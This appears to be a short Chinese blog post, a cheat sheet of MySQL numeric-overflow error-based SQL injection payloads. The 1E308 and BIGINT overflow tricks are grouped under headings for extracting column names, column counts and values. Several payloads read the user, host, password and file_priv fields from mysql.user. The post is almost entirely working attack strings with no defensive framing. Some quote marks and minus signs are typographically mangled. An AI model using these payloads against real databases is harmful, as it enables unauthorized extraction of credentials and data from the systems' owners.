select 1E308*if((select*from(select version())x),2,2)
SELECT (i IS NOT NULL) – -9223372036854775808 FROM (SELECT (version())i)a
select if(x,2,2)*1E308 from(select version()x)y
获取字段名称
SELECT 2 * if((SELECT * from (select * from test.shop) as “ limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
select 1E308*if((select*from(select*from mysql.user)“limit 1)>(select*from mysql.user limit 1),2,2)
获取所有字段值
SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as “ limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)
相当于
select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)
获取指定字段值
select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)
获取字段个数
select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)
select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);
select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308
select (x!=0x00)–9223372036854775808 from(SELECT version()x)y
select!x-~0.FROM(select+user()x)f;
扫一扫
1214
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
